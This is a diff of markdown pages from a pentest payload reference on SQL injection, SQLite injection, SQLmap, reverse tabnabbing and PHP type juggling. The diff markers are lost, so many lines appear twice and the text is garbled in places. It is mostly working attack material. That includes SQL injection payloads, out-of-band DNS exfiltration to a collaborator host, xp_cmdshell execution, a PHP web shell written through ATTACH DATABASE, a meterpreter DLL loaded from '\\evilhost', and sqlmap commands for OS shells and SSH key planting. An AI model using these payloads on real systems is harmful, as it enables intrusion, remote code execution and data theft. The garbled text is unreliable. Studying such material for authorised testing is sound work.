In PHP, if the optional `binary` parameter is set to true, then the `md5` digest is instead returned in raw binary format with a length of 16. Let's take this PHP code where the authentication is checking the MD5 hash of the password submitted by the user.
@ -171,7 +166,6 @@ sql = "SELECT * FROM admin WHERE pass = '".md5($password,true)."'";
An attacker can craft a payload where the result of the `md5($password,true)` function will contain a quote and escape the SQL context, for example with `' or 'SOMETHING`.
| Hash | Input | Output (Raw) | Payload |
| ---- | -------- | ----------------------- | --------- |
| md5 | ffifdyop | `'or'6<>]<5D><>!r,<2C><>b` | `'or'` |
@ -187,12 +181,11 @@ sql1 = "SELECT * FROM admin WHERE pass = '".md5("ffifdyop", true)."'";
sql1 = "SELECT * FROM admin WHERE pass = ''or'6<>]<5D><>!r,<2C><>b'";
```
## UNION Based Injection
In a standard SQL query, data is retrieved from one table. The `UNION` operator allows multiple `SELECT` statements to be combined. If an application is vulnerable to SQL injection, an attacker can inject a crafted SQL query that appends a `UNION` statement to the original query.
Let's assume a vulnerable web application retrieves product details based on a product ID from a database:
Let's assume a vulnerable web application retrieves product details based on a product ID from a database:
```sql
SELECT product_name, product_price FROM products WHERE product_id = 'input_id';
@ -212,7 +205,6 @@ SELECT product_name, product_price FROM products WHERE product_id = '1' UNION SE
:warning: The 2 SELECT clauses must have the same number of columns.
## Error Based Injection
Error-Based SQL Injection is a technique that relies on the error messages returned from the database to gather information about the database structure. By manipulating the input parameters of an SQL query, an attacker can make the database generate error messages. These errors can reveal critical details about the database, such as table names, column names, and data types, which can be used to craft further attacks.
@ -229,11 +221,9 @@ The error will leak the output of the `version()`.
ERROR: invalid input syntax for type numeric: "PostgreSQL 9.5.25 on x86_64-pc-linux-gnu"
```
## Blind Injection
Blind SQL Injection is a type of SQL Injection attack that asks the database true or false questions and determines the answer based on the application's response.
Blind SQL Injection is a type of SQL Injection attack that asks the database true or false questions and determines the answer based on the application's response.
### Boolean Based Injection
@ -243,14 +233,14 @@ Size of the page, HTTP response code, or missing parts of the page are strong in
Here is a naive example to recover the content of the `@@hostname` variable.
**Identify Injection Point and Confirm Vulnerability** : Inject a payload that evaluates to true/false to confirm SQL injection vulnerability. For example:
**Identify Injection Point and Confirm Vulnerability** : Inject a payload that evaluates to true/false to confirm SQL injection vulnerability. For example:
```ps1
http://example.com/item?id=1 AND 1=1 -- (Expected: Normal response)
http://example.com/item?id=1 AND 1=2 -- (Expected: Different response or error)
```
**Extract Hostname Length**: Guess the length of the hostname by incrementing until the response indicates a match. For example:
**Extract Hostname Length**: Guess the length of the hostname by incrementing until the response indicates a match. For example:
```ps1
http://example.com/item?id=1 AND LENGTH(@@hostname)=1 -- (Expected: No change)
@ -258,23 +248,21 @@ http://example.com/item?id=1 AND LENGTH(@@hostname)=2 -- (Expected: No change)
http://example.com/item?id=1 AND LENGTH(@@hostname)=N -- (Expected: Change in response)
```
**Extract Hostname Characters** : Extract each character of the hostname using substring and ASCII comparison:
**Extract Hostname Characters** : Extract each character of the hostname using substring and ASCII comparison:
```ps1
http://example.com/item?id=1 AND ASCII(SUBSTRING(@@hostname, 1, 1)) > 64 --
http://example.com/item?id=1 AND ASCII(SUBSTRING(@@hostname, 1, 1)) = 104 --
```
Then repeat the method to discover every characters of the `@@hostname`. Obviously this example is not the fastest way to obtain them. Here are a few pointers to speed it up:
- Extract characters using dichotomy: it reduces the number of requests from linear to logarithmic time, making data extraction much more efficient.
* Extract characters using dichotomy: it reduces the number of requests from linear to logarithmic time, making data extraction much more efficient.
### Blind Error Based Injection
Attacks rely on sending an SQL query to the database, making the application return a different result depending on whether the query returned successfully or triggered an error. In this case, we only infer the success from the server's answer, but the data is not extracted from output of the error.
**Example**: Using `json()` function in SQLite to trigger an error as an oracle to know when the injection is true or false.
```sql
@ -282,7 +270,6 @@ Attacks rely on sending an SQL query to the database, making the application ret
' AND CASE WHEN 1=2 THEN 1 ELSE json('') END AND 'A'='A -- malformed JSON
```
### Time Based Injection
Time-based SQL Injection is a type of blind SQL Injection attack that relies on database delays to infer whether certain queries return true or false. It is used when an application does not display any direct feedback from the database queries but allows execution of time-delayed SQL commands. The attacker can analyze the time it takes for the database to respond to indirectly gather information from the database.
@ -309,12 +296,11 @@ http://example.com/item?id=1 AND IF(SUBSTRING(VERSION(), 1, 1) = '5', BENCHMARK(
If the server's response is taking a few seconds before getting received, then the version is starting is by '5'.
### Out of Band (OAST)
Out-of-Band SQL Injection (OOB SQLi) occurs when an attacker uses alternative communication channels to exfiltrate data from a database. Unlike traditional SQL injection techniques that rely on immediate responses within the HTTP response, OOB SQL injection depends on the database server's ability to make network connections to an attacker-controlled server. This method is particularly useful when the injected SQL command's results cannot be seen directly or the server's responses are not stable or reliable.
Out-of-Band SQL Injection (OOB SQLi) occurs when an attacker uses alternative communication channels to exfiltrate data from a database. Unlike traditional SQL injection techniques that rely on immediate responses within the HTTP response, OOB SQL injection depends on the database server's ability to make network connections to an attacker-controlled server. This method is particularly useful when the injected SQL command's results cannot be seen directly or the server's responses are not stable or reliable.
Different databases offer various methods for creating out-of-band connections, the most common technique is the DNS exfiltration:
Different databases offer various methods for creating out-of-band connections, the most common technique is the DNS exfiltration:
* MySQL
@ -330,7 +316,6 @@ Different databases offer various methods for creating out-of-band connections,
exec master..xp_dirtree '//BURP-COLLABORATOR-SUBDOMAIN/a'
```
## Stacked Based Injection
Stacked Queries SQL Injection is a technique where multiple SQL statements are executed in a single query, separated by a delimiter such as a semicolon (`;`). This allows an attacker to execute additional malicious SQL commands following a legitimate query. Not all databases or application configurations support stacked queries.
@ -339,7 +324,6 @@ Stacked Queries SQL Injection is a technique where multiple SQL statements are e
1; EXEC xp_cmdshell('whoami') --
```
## Polyglot Injection
A polygot SQL injection payload is a specially crafted SQL injection attack string that can successfully execute in multiple contexts or environments without modification. This means that the payload can bypass different types of validation, parsing, or execution logic in a web application or database by being valid SQL in various scenarios.
@ -348,7 +332,6 @@ A polygot SQL injection payload is a specially crafted SQL injection attack stri
SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
```
## Routed Injection
> Routed SQL injection is a situation where the injectable query is not the one which gives output but the output of injectable query goes to the query which gives output. - Zenodermus Javanicus
@ -371,7 +354,6 @@ In short, the result of the first SQL query is used to build the second SQL quer
-1' union select 0x2d312720756e696f6e2073656c656374206c6f67696e2c70617373776f72642066726f6d2075736572732d2d2061 -- a
```
## Second Order SQL Injection
Second Order SQL Injection is a subtype of SQL injection where the malicious SQL payload is primarily stored in the application's database and later executed by a different functionality of the same application.
@ -383,7 +365,6 @@ password="P@ssw0rd"
Since you are inserting your payload in the database for a later use, any other type of injections can be used UNION, ERROR, BLIND, STACKED, etc.
## Generic WAF Bypass
### White Spaces
@ -403,13 +384,12 @@ Bypass using whitespace alternatives.
| DBMS | ASCII characters in hexadecimal |
| ---------- | ------------------------------- |
| SQLite3 | 0A, 0D, 0C, 09, 20 |
| MySQL 5 | 09, 0A, 0B, 0C, 0D, A0, 20 |
| MySQL 3 | 01, 02, 03, 04, 05, 06, 07, 08, 09, 0A, 0B, 0C, 0D, 0E, 0F, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 1A, 1B, 1C, 1D, 1E, 1F, 20, 7F, 80, 81, 88, 8D, 8F, 90, 98, 9D, A0 |
| MySQL 5 | 09, 0A, 0B, 0C, 0D, A0, 20 |
| MySQL 3 | 01, 02, 03, 04, 05, 06, 07, 08, 09, 0A, 0B, 0C, 0D, 0E, 0F, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 1A, 1B, 1C, 1D, 1E, 1F, 20, 7F, 80, 81, 88, 8D, 8F, 90, 98, 9D, A0 |
| PostgreSQL | 0A, 0D, 0C, 09, 20 |
| Oracle 11g | 00, 0A, 0D, 0C, 09, 20 |
| MSSQL | 01, 02, 03, 04, 05, 06, 07, 08, 09, 0A, 0B, 0C, 0D, 0E, 0F, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 1A, 1B, 1C, 1D, 1E, 1F, 20 |
Bypass using comments and parenthesis.
| Bypass | Technique |
@ -418,9 +398,8 @@ Bypass using comments and parenthesis.
| `?id=1/*!12345UNION*//*!12345SELECT*/1--` | Conditional comment |
| `?id=(1)and(1)=(1)--` | Parenthesis |
### No Comma Allowed
Bypass using `OFFSET`, `FROM` and `JOIN`.
| Forbidden | Bypass |
@ -429,12 +408,10 @@ Bypass using `OFFSET`, `FROM` and `JOIN`.
| `SUBSTR('SQL',1,1)` | `SUBSTR('SQL' FROM 1 FOR 1)` |
| `SELECT 1,2,3,4` | `UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d` |
### No Equal Allowed
Bypass using LIKE/NOT IN/IN/BETWEEN
| Bypass | SQL Example |
| --------- | ------------------------------------------ |
| `LIKE` | `SUBSTRING(VERSION(),1,1)LIKE(5)` |
@ -442,7 +419,6 @@ Bypass using LIKE/NOT IN/IN/BETWEEN
| `IN` | `SUBSTRING(VERSION(),1,1)IN(4,3)` |
| `BETWEEN` | `SUBSTRING(VERSION(),1,1) BETWEEN 3 AND 4` |
### Case Modification
Bypass using uppercase/lowercase.
@ -453,7 +429,6 @@ Bypass using uppercase/lowercase.
| `and` | Lowercase |
| `aNd` | Mixed case |
Bypass using keywords case insensitive or an equivalent operator.
| Forbidden | Bypass |
@ -464,8 +439,7 @@ Bypass using keywords case insensitive or an equivalent operator.
| `>` | `NOT BETWEEN 0 AND X` |
| `WHERE` | `HAVING` |
## Labs
## Labs
* [PortSwigger - SQL injection vulnerability in WHERE clause allowing retrieval of hidden data](https://portswigger.net/web-security/sql-injection/lab-retrieve-hidden-data)
* [PortSwigger - SQL injection vulnerability allowing login bypass](https://portswigger.net/web-security/sql-injection/lab-login-bypass)
@ -485,7 +459,6 @@ Bypass using keywords case insensitive or an equivalent operator.
* [Root Me - SQL injection - Filter bypass](https://www.root-me.org/en/Challenges/Web-Server/SQL-injection-Filter-bypass)
* [Root Me - SQL Truncation](https://www.root-me.org/en/Challenges/Web-Server/SQL-Truncation)
## References
* [Analyzing CVE-2018-6376 Joomla!, Second Order SQL Injection - Not So Secure - February 9, 2018](https://web.archive.org/web/20180209143119/https://www.notsosecure.com/analyzing-cve-2018-6376/)

38
SQL Injection/SQLite Injection.md
View file

@ -1,7 +1,6 @@
# SQLite Injection
> SQLite Injection is a type of security vulnerability that occurs when an attacker can insert or "inject" malicious SQL code into SQL queries executed by an SQLite database. This vulnerability arises when user inputs are integrated into SQL statements without proper sanitization or parameterization, allowing attackers to manipulate the query logic. Such injections can lead to unauthorized data access, data manipulation, and other severe security issues.
> SQLite Injection is a type of security vulnerability that occurs when an attacker can insert or "inject" malicious SQL code into SQL queries executed by an SQLite database. This vulnerability arises when user inputs are integrated into SQL statements without proper sanitization or parameterization, allowing attackers to manipulate the query logic. Such injections can lead to unauthorized data access, data manipulation, and other severe security issues.
## Summary
@ -17,12 +16,11 @@
* [SQlite Remote Code Execution](#sqlite-remote-code-execution)
* [Attach Database](#attach-database)
* [Load_extension](#load_extension)
* [SQLite File Manipulation](#SQLite-file-manipulation)
* [SQLite Read File](#SQLite-read-file)
* [SQLite Write File](#SQLite-write-file)
* [SQLite File Manipulation](#sqlite-file-manipulation)
* [SQLite Read File](#sqlite-read-file)
* [SQLite Write File](#sqlite-write-file)
* [References](#references)
## SQLite Comments
| Description | Comment |
@ -30,20 +28,18 @@
| Single-Line Comment | `--` |
| Multi-Line Comment | `/**/` |
## SQLite Enumeration
| Description | SQL Query |
| ------------- | ----------------------------------------- |
| DBMS version | `select sqlite_version();` |
## SQLite String
### SQLite String Methodology
| Description | SQL Query |
| ----------------------- | ----------------------------------------- |
| ----------------------- | ----------------------------------------- |
| Extract Database Structure | `SELECT sql FROM sqlite_schema` |
| Extract Database Structure (sqlite_version > 3.33.0) | `SELECT sql FROM sqlite_master` |
| Extract Table Name | `SELECT tbl_name FROM sqlite_master WHERE type='table'` |
@ -53,26 +49,23 @@
| Extract Column Name | `SELECT MAX(sql) FROM sqlite_master WHERE tbl_name='<TABLE_NAME>'` |
| Extract Column Name | `SELECT name FROM PRAGMA_TABLE_INFO('<TABLE_NAME>')` |
## SQLite Blind
### SQLite Blind Methodology
| Description | SQL Query |
| ----------------------- | ----------------------------------------- |
| Count Number Of Tables | `AND (SELECT count(tbl_name) FROM sqlite_master WHERE type='table' AND tbl_name NOT LIKE 'sqlite_%' ) < number_of_table` |
| Enumerating Table Name | `AND (SELECT length(tbl_name) FROM sqlite_master WHERE type='table' AND tbl_name NOT LIKE 'sqlite_%' LIMIT 1 OFFSET 0)=table_name_length_number` |
| Extract Info | `AND (SELECT hex(substr(tbl_name,1,1)) FROM sqlite_master WHERE type='table' AND tbl_name NOT LIKE 'sqlite_%' LIMIT 1 OFFSET 0) > HEX('some_char')` |
| Extract Info (order by) | `CASE WHEN (SELECT hex(substr(sql,1,1)) FROM sqlite_master WHERE type='table' AND tbl_name NOT LIKE 'sqlite_%' LIMIT 1 OFFSET 0) = HEX('some_char') THEN <order_element_1> ELSE <order_element_2> END` |
| ----------------------- | ----------------------------------------- |
| Count Number Of Tables | `AND (SELECT count(tbl_name) FROM sqlite_master WHERE type='table' AND tbl_name NOT LIKE 'sqlite_%' ) < number_of_table` |
| Enumerating Table Name | `AND (SELECT length(tbl_name) FROM sqlite_master WHERE type='table' AND tbl_name NOT LIKE 'sqlite_%' LIMIT 1 OFFSET 0)=table_name_length_number` |
| Extract Info | `AND (SELECT hex(substr(tbl_name,1,1)) FROM sqlite_master WHERE type='table' AND tbl_name NOT LIKE 'sqlite_%' LIMIT 1 OFFSET 0) > HEX('some_char')` |
| Extract Info (order by) | `CASE WHEN (SELECT hex(substr(sql,1,1)) FROM sqlite_master WHERE type='table' AND tbl_name NOT LIKE 'sqlite_%' LIMIT 1 OFFSET 0) = HEX('some_char') THEN <order_element_1> ELSE <order_element_2> END` |
### SQLite Blind With Substring Equivalent
| Function | Example |
| ----------- | ----------------------------------------- |
| `SUBSTRING` | `SUBSTRING('foobar', <START>, <LENGTH>)` |
| `SUBSTR` | `SUBSTR('foobar', <START>, <LENGTH>)` |
| ----------- | ----------------------------------------- |
| `SUBSTRING` | `SUBSTRING('foobar', <START>, <LENGTH>)` |
| `SUBSTR` | `SUBSTR('foobar', <START>, <LENGTH>)` |
## SQlite Error Based
@ -80,7 +73,6 @@
AND CASE WHEN [BOOLEAN_QUERY] THEN 1 ELSE load_extension(1) END
```
## SQlite Time Based
```sql
@ -88,7 +80,6 @@ AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))
AND 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
```
## SQLite Remote Code Execution
### Attach Database
@ -107,21 +98,18 @@ INSERT INTO lol.pwn (dataz) VALUES ("<?php system($_GET['cmd']); ?>");--
UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');--
```
## SQLite File Manipulation
### SQLite Read File
SQLite does not support file I/O operations by default.
### SQLite Write File
```sql
SELECT writefile('/path/to/file', column_name) FROM table_name
```
## References
* [Injecting SQLite database based application - Manish Kishan Tanwar - February 14, 2017](https://www.exploit-db.com/docs/english/41397-injecting-sqlite-database-based-applications.pdf)

54
SQL Injection/SQLmap.md
View file

@ -1,13 +1,9 @@
# SQLmap
> SQLmap is a powerful tool that automates the detection and exploitation of SQL injection vulnerabilities, saving time and effort compared to manual testing. It supports a wide range of databases and injection techniques, making it versatile and effective in various scenarios.
> SQLmap is a powerful tool that automates the detection and exploitation of SQL injection vulnerabilities, saving time and effort compared to manual testing. It supports a wide range of databases and injection techniques, making it versatile and effective in various scenarios.
> Additionally, SQLmap can retrieve data, manipulate databases, and even execute commands, providing a robust set of features for penetration testers and security analysts.
> Reinventing the wheel isn't ideal because SQLmap has been rigorously developed, tested, and improved by experts. Using a reliable, community-supported tool means you benefit from established best practices and avoid the high risk of missing vulnerabilities or introducing errors in custom code.
>However you should always know how SQLmap is working, and be able to replicate it manually if necessary.
> However you should always know how SQLmap is working, and be able to replicate it manually if necessary.
## Summary
@ -25,14 +21,12 @@
* [SQLmap Without SQL Injection](#sqlmap-without-sql-injection)
* [References](#references)
## Basic Arguments For SQLmap
```powershell
sqlmap --url="<url>" -p username --user-agent=SQLMAP --random-agent --threads=10 --risk=3 --level=5 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs
```
## Load A Request File
A request file in SQLmap is a saved HTTP request that SQLmap reads and uses to perform SQL injection testing. This file allows you to provide a complete and custom HTTP request, which SQLmap can use to target more complex applications.
@ -41,7 +35,6 @@ A request file in SQLmap is a saved HTTP request that SQLmap reads and uses to p
sqlmap -r request.txt
```
## Custom Injection Point
A custom injection point in SQLmap allows you to specify exactly where and how SQLmap should attempt to inject payloads into a request. This is useful when dealing with more complex or non-standard injection scenarios that SQLmap may not detect automatically.
@ -52,40 +45,41 @@ By defining a custom injection point with the wildcard character '`*`' , you hav
python sqlmap.py -u "http://example.com" --data "username=admin&password=pass" --headers="x-forwarded-for:127.0.0.1*"
```
## Second Order Injection
A second-order SQL injection occurs when malicious SQL code injected into an application is not executed immediately but is instead stored in the database and later used in another SQL query.
A second-order SQL injection occurs when malicious SQL code injected into an application is not executed immediately but is instead stored in the database and later used in another SQL query.
```powershell
sqlmap -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wishlist" -v 3
sqlmap -r 1.txt -dbms MySQL -second-order "http://<IP/domain>/joomla/administrator/index.php" -D "joomla" -dbs
```
## Getting A Shell
* SQL Shell:
* SQL Shell:
```ps1
python sqlmap.py -u "http://example.com/?id=1" -p id --sql-shell
```
* OS Shell:
* OS Shell:
```ps1
python sqlmap.py -u "http://example.com/?id=1" -p id --os-shell
```
* Meterpreter:
* Meterpreter:
```ps1
python sqlmap.py -u "http://example.com/?id=1" -p id --os-pwn
```
* SSH Shell:
* SSH Shell:
```ps1
python sqlmap.py -u "http://example.com/?id=1" -p id --file-write=/root/.ssh/id_rsa.pub --file-destination=/home/user/.ssh/
```
## Crawl And Auto-Exploit
This method is not advisable for penetration testing; it should only be used in controlled environments or challenges. It will crawl the entire website and automatically submit forms, which may lead to unintended requests being sent to sensitive features like "delete" or "destroy" endpoints.
@ -98,7 +92,6 @@ sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threa
* `--crawl` = How deep you want to crawl a site
* `--forms` = Parse and test forms
## Proxy Configuration For SQLmap
To run SQLmap with a proxy, you can use the `--proxy` option followed by the proxy URL. SQLmap supports various types of proxies such as HTTP, HTTPS, SOCKS4, and SOCKS5.
@ -109,23 +102,26 @@ sqlmap -u "http://www.target.com/page.php?id=1" --proxy="http://127.0.0.1:8080"
```
* HTTP Proxy:
```ps1
--proxy="http://[username]:[password]@[proxy_ip]:[proxy_port]"
--proxy="http://user:pass@127.0.0.1:8080"
```
* SOCKS Proxy:
```ps1
--proxy="socks4://[username]:[password]@[proxy_ip]:[proxy_port]"
--proxy="socks4://user:pass@127.0.0.1:1080"
```
* SOCKS5 Proxy:
```ps1
--proxy="socks5://[username]:[password]@[proxy_ip]:[proxy_port]"
--proxy="socks5://user:pass@127.0.0.1:1080"
```
## Injection Tampering
In SQLmap, tampering can help you adjust the injection in specific ways required to bypass web application firewalls (WAFs) or custom sanitization mechanisms. SQLmap provides various options and techniques to tamper with the payloads being used for SQL injection.
@ -139,7 +135,6 @@ python sqlmap.py -u "http://example.com/?id=1" -p id --suffix="-- "
* `--suffix=SUFFIX`: Injection payload suffix string
* `--prefix=PREFIX`: Injection payload prefix string
### Tamper Scripts
A tamper script is a script that modifies the SQL injection payloads to evade detection by WAFs or other security mechanisms. SQLmap comes with a variety of pre-built tamper scripts that can be used to automatically adjust payloads
@ -150,7 +145,7 @@ sqlmap -u "http://targetwebsite.com/vulnerablepage.php?id=1" --tamper=space2comm
| Tamper | Description |
| --- | --- |
|0x2char.py | Replaces each (MySQL) 0x<hex> encoded string with equivalent CONCAT(CHAR(),…) counterpart |
|0x2char.py | Replaces each (MySQL) 0xHEX encoded string with equivalent CONCAT(CHAR(),…) counterpart |
|apostrophemask.py | Replaces apostrophe character with its UTF-8 full width counterpart |
|apostrophenullencode.py | Replaces apostrophe character with its illegal double unicode counterpart|
|appendnullbyte.py | Appends encoded NULL byte character at the end of payload |
@ -172,7 +167,7 @@ sqlmap -u "http://targetwebsite.com/vulnerablepage.php?id=1" --tamper=space2comm
|greatest.py | Replaces greater than operator ('>') with 'GREATEST' counterpart |
|halfversionedmorekeywords.py | Adds versioned MySQL comment before each keyword |
|htmlencode.py | HTML encode (using code points) all non-alphanumeric characters (e.g. -> &#39;) |
|ifnull2casewhenisnull.py | Replaces instances like IFNULL(A, B) with CASE WHEN ISNULL(A) THEN (B) ELSE (A) END counterpart|
|ifnull2casewhenisnull.py | Replaces instances like IFNULL(A, B) with CASE WHEN ISNULL(A) THEN (B) ELSE (A) END counterpart|
|ifnull2ifisnull.py | Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)'|
|informationschemacomment.py | Add an inline comment (/**/) to the end of all occurrences of (MySQL) “information_schema” identifier |
|least.py | Replaces greater than operator (>) with LEAST counterpart |
@ -200,7 +195,7 @@ sqlmap -u "http://targetwebsite.com/vulnerablepage.php?id=1" --tamper=space2comm
|space2mysqldash.py | Replaces space character (' ') with a dash comment ('--') followed by a new line ('\n') |
|space2plus.py | Replaces space character (' ') with plus ('+') |
|space2randomblank.py | Replaces space character (' ') with a random blank character from a valid set of alternate characters |
|symboliclogical.py | Replaces AND and OR logical operators with their symbolic counterparts (&& and ||) |
|symboliclogical.py | Replaces AND and OR logical operators with their symbolic counterparts (&& and \|\|) |
|unionalltounion.py | Replaces UNION ALL SELECT with UNION SELECT |
|unmagicquotes.py | Replaces quote character (') with a multi-byte combo %bf%27 together with generic comment at the end (to make it work) |
|uppercase.py | Replaces each keyword character with upper case value 'INSERT'|
@ -209,7 +204,6 @@ sqlmap -u "http://targetwebsite.com/vulnerablepage.php?id=1" --tamper=space2comm
|versionedmorekeywords.py | Encloses each keyword with versioned MySQL comment |
|xforwardedfor.py | Append a fake HTTP header 'X-Forwarded-For' |
## Reduce Requests Number
The parameter `--test-filter` is helpful when you want to focus on specific types of SQL injection techniques or payloads. Instead of testing the full range of payloads that SQLMap has, you can limit it to those that match a certain pattern, making the process more efficient, especially on large or slow web applications.
@ -219,7 +213,7 @@ sqlmap -u "https://www.target.com/page.php?category=demo" -p category --test-fil
sqlmap -u "https://www.target.com/page.php?category=demo" --test-filter="boolean"
```
By default, SQLmap runs with level 1 and risk 1, which generates fewer requests. Increasing these values without a purpose may lead to a larger number of tests that are time-consuming and unnecessary.
By default, SQLmap runs with level 1 and risk 1, which generates fewer requests. Increasing these values without a purpose may lead to a larger number of tests that are time-consuming and unnecessary.
```ps1
sqlmap -u "https://www.target.com/page.php?id=1" --level=1 --risk=1
@ -231,10 +225,9 @@ Use the `--technique` option to specify the types of SQL injection techniques to
sqlmap -u "https://www.target.com/page.php?id=1" --technique=B
```
## SQLmap Without SQL Injection
Using SQLmap without exploiting SQL injection vulnerabilities can still be useful for various legitimate purposes, particularly in security assessments, database management, and application testing.
Using SQLmap without exploiting SQL injection vulnerabilities can still be useful for various legitimate purposes, particularly in security assessments, database management, and application testing.
You can use SQLmap to access a database via its port instead of a URL.
@ -242,8 +235,7 @@ You can use SQLmap to access a database via its port instead of a URL.
sqlmap.py -d "mysql://user:pass@ip/database" --dump-all
```
## References
- [#SQLmap protip - @zh4ck - March 10, 2018](https://twitter.com/zh4ck/status/972441560875970560)
- [Exploiting Second Order SQLi Flaws by using Burp & Custom Sqlmap Tamper - Mehmet Ince - August 1, 2017](https://pentest.blog/exploiting-second-order-sqli-flaws-by-using-burp-custom-sqlmap-tamper/)
* [#SQLmap protip - @zh4ck - March 10, 2018](https://twitter.com/zh4ck/status/972441560875970560)
* [Exploiting Second Order SQLi Flaws by using Burp & Custom Sqlmap Tamper - Mehmet Ince - August 1, 2017](https://pentest.blog/exploiting-second-order-sqli-flaws-by-using-burp-custom-sqlmap-tamper/)

16
Tabnabbing/README.md
View file

@ -2,7 +2,6 @@
> Reverse tabnabbing is an attack where a page linked from the target page is able to rewrite that page, for example to replace it with a phishing site. As the user was originally on the correct page they are less likely to notice that it has been changed to a phishing site, especially if the site looks the same as the target. If the user authenticates to this new page then their credentials (or other sensitive data) are sent to the phishing site rather than the legitimate one.
## Summary
* [Tools](#tools)
@ -11,18 +10,15 @@
* [Discover](#discover)
* [References](#references)
## Tools
- [PortSwigger/discovering-reversetabnabbing](https://portswigger.net/bappstore/80eb8fd46bf847b4b17861482c2f2a30) - Discovering Reverse Tabnabbing
* [PortSwigger/discovering-reversetabnabbing](https://portswigger.net/bappstore/80eb8fd46bf847b4b17861482c2f2a30) - Discovering Reverse Tabnabbing
## Methodology
When tabnabbing, the attacker searches for links that are inserted into the website and are under his control. Such links may be contained in a forum post, for example. Once he has found this kind of functionality, it checks that the link's `rel` attribute does not contain the value `noopener` and the target attribute contains the value `_blank`. If this is the case, the website is vulnerable to tabnabbing.
## Exploit
## Exploit
1. Attacker posts a link to a website under his control that contains the following JS code: `window.opener.location = "http://evil.com"`
2. He tricks the victim into visiting the link, which is opened in the browser in a new tab.
@ -30,18 +26,16 @@ When tabnabbing, the attacker searches for links that are inserted into the webs
4. If the victim opens the background tab again and doesn't look at the address bar, it may happen that he thinks he is logged out, because a login page appears, for example.
5. The victim tries to log on again and the attacker receives the credentials
## Discover
Search for the following link formats:
Search for the following link formats:
```html
<a href="..." target="_blank" rel="">
<a href="..." target="_blank">
```
## References
- [Reverse Tabnabbing - OWASP - October 20, 2020](https://owasp.org/www-community/attacks/Reverse_Tabnabbing)
- [Tabnabbing - Wikipedia - May 25, 2010](https://en.wikipedia.org/wiki/Tabnabbing)
* [Reverse Tabnabbing - OWASP - October 20, 2020](https://owasp.org/www-community/attacks/Reverse_Tabnabbing)
* [Tabnabbing - Wikipedia - May 25, 2010](https://en.wikipedia.org/wiki/Tabnabbing)

110
Type Juggling/README.md
View file

@ -2,25 +2,23 @@
> PHP is a loosely typed language, which means it tries to predict the programmer's intent and automatically converts variables to different types whenever it seems necessary. For example, a string containing only numbers can be treated as an integer or a float. However, this automatic conversion (or type juggling) can lead to unexpected results, especially when comparing variables using the '==' operator, which only checks for value equality (loose comparison), not type and value equality (strict comparison).
## Summary
* [Loose Comparison](#loose-comparison)
* [True Statements](#true-statements)
* [NULL Statements](#null-statements)
* [Loose Comparison](#loose-comparison)
* [True Statements](#true-statements)
* [NULL Statements](#null-statements)
* [Loose Comparison](#loose-comparison)
* [Magic Hashes](#magic-hashes)
* [Methodology](#methodology)
* [Labs](#labs)
* [References](#references)
## Loose Comparison
> PHP type juggling vulnerabilities arise when loose comparison (== or !=) is employed instead of strict comparison (=== or !==) in an area where the attacker can control one of the variables being compared. This vulnerability can result in the application returning an unintended answer to the true or false statement, and can lead to severe authorization and/or authentication bugs.
- **Loose** comparison: using `== or !=` : both variables have "the same value".
- **Strict** comparison: using `=== or !==` : both variables have "the same type and the same value".
* **Loose** comparison: using `== or !=` : both variables have "the same value".
* **Strict** comparison: using `=== or !==` : both variables have "the same type and the same value".
### True Statements
@ -29,18 +27,18 @@
| `'0010e2' == '1e3'` | true |
| `'0xABCdef' == ' 0xABCdef'` | true (PHP 5.0) / false (PHP 7.0) |
| `'0xABCdef' == ' 0xABCdef'` | true (PHP 5.0) / false (PHP 7.0) |
| `'0x01' == 1` | true (PHP 5.0) / false (PHP 7.0) |
| `'0x01' == 1` | true (PHP 5.0) / false (PHP 7.0) |
| `'0x1234Ab' == '1193131'` | true (PHP 5.0) / false (PHP 7.0) |
| `'123' == 123` | true |
| `'123a' == 123` | true |
| `'abc' == 0` | true |
| `'' == 0 == false == NULL` | true |
| `'' == 0` | true |
| `0 == false ` | true |
| `0 == false` | true |
| `false == NULL` | true |
| `NULL == ''` | true |
> PHP8 won't try to cast string into numbers anymore, thanks to the Saner string to number comparisons RFC, meaning that collision with hashes starting with 0e and the likes are finally a thing of the past! The Consistent type errors for internal functions RFC will prevent things like `0 == strcmp($_GET['username'], $password)` bypasses, since strcmp won't return null and spit a warning any longer, but will throw a proper exception instead.
> PHP8 won't try to cast string into numbers anymore, thanks to the Saner string to number comparisons RFC, meaning that collision with hashes starting with 0e and the likes are finally a thing of the past! The Consistent type errors for internal functions RFC will prevent things like `0 == strcmp($_GET['username'], $password)` bypasses, since strcmp won't return null and spit a warning any longer, but will throw a proper exception instead.
![LooseTypeComparison](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Type%20Juggling/Images/table_representing_behavior_of_PHP_with_loose_type_comparisons.png?raw=true)
@ -55,7 +53,6 @@ Loose Type comparisons occurs in many languages:
* [Python](https://github.com/Hakumarachi/Loose-Compare-Tables/tree/master/results/Python)
* [SQLite](https://github.com/Hakumarachi/Loose-Compare-Tables/tree/master/results/SQLite/2.6.0)
### NULL Statements
| Function | Statement | Output |
@ -63,10 +60,9 @@ Loose Type comparisons occurs in many languages:
| sha1 | `var_dump(sha1([]));` | NULL |
| md5 | `var_dump(md5([]));` | NULL |
## Magic Hashes
> Magic hashes arise due to a quirk in PHP's type juggling, when comparing string hashes to integers. If a string hash starts with "0e" followed by only numbers, PHP interprets this as scientific notation and the hash is treated as a float in comparison operations.
> Magic hashes arise due to a quirk in PHP's type juggling, when comparing string hashes to integers. If a string hash starts with "0e" followed by only numbers, PHP interprets this as scientific notation and the hash is treated as a float in comparison operations.
| Hash | "Magic" Number / String | Magic Hash | Found By / Description |
| ---- | -------------------------- |:---------------------------------------------:| -------------:|
